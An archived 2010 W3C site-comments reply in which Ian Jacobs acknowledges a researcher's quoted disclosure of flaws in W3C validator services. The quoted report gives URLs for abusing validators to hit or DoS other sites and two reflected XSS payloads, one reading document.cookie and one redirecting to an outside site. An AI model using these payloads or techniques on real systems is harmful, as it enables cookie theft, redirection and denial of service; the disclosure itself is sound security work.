Re: Vulnerabilities at www.w3.org from Ian Jacobs on 2010-06-30 (site-comments@w3.org from June 2010)

From: Ian Jacobs <ij@w3.org>
Date: Wed, 30 Jun 2010 10:39:37 -0500
To: "MustLive" <mustlive@websecurity.com.ua>
Cc: <admin@w3.org>, <site-comments@w3.org>
Message-Id: <EA49575B-D241-4040-8610-9E0B9BD4056C@w3.org>

On 30 Jun 2010, at 4:34 AM, MustLive wrote:

> Hello administrator of www.w3.org!
>
> I want to warn you about security vulnerabilities at your site.
>

Hi ML,

Thanks for sending this to us. We are aware of this and are looking  
into finding the right balance between continuing to offer services  
and to avoid abuse.

Best,

_ Ian

> These are Abuse of Functionality, Insufficient Anti-automation and  
> Cross-Site Scripting vulnerabilities.
>
> Abuse of Functionality:
>
> This functionality can be used for conducting of CSRF attacks on  
> other sites.
>
> http://validator.w3.org/feed/check.cgi?url=http://google.com
>
> http://www.w3.org/2001/03/webdata/xsv?docAddrs=http://google.com&style=xsl
>
> http://validator.w3.org/check?uri=http://google.com
>
> http://jigsaw.w3.org/css-validator/validator?uri=http://google.com
>
> http://validator.w3.org/checklink?uri=http://google.com
>
> Note, that service W3C Link Checker can be used for scanning of  
> whole site and so it consumes more resources, as of W3C's server, as  
> of site which is scanning. It can be used for conducting of DoS  
> attacks on mentioned servers. About such attacks I mentioned in  
> article DoS attacks via Abuse of Functionality vulnerabilities (http://websecurity.com.ua/2981/ 
> ).
>
> http://qa-dev.w3.org/unicorn/check?ucn_uri=google.com&ucn_task=conformance
>
> http://www.w3.org/RDF/Validator/ARPServlet?URI=http://google.com
>
> Insufficient Anti-automation:
>
> At these pages there is no protection from automated requests  
> (captcha). Which allows to automate process of conducting of CSRF  
> attacks at other sites.
>
> XSS (IE):
>
> http://www.w3.org/2001/03/webdata/xsv?docAddrs=%3Cscript%3Ealert(document.cookie)%3C/script%3E&style=xsl
>
> http://www.w3.org/2001/03/webdata/xsv?docAddrs=%3Cscript%3Edocument.location%3D%22http://websecurity.com.ua%22%3C/script%3E&style=xsl
>
> Works only in Internet Explorer.
>
> Attend to security of all of yours web sites, web software and to  
> security audit.
>
> I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/4320/ 
> ).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua

--
Ian Jacobs (ij@w3.org)    http://www.w3.org/People/Jacobs/
Tel:                                      +1 718 260 9447

Received on Wednesday, 30 June 2010 15:39:44 UTC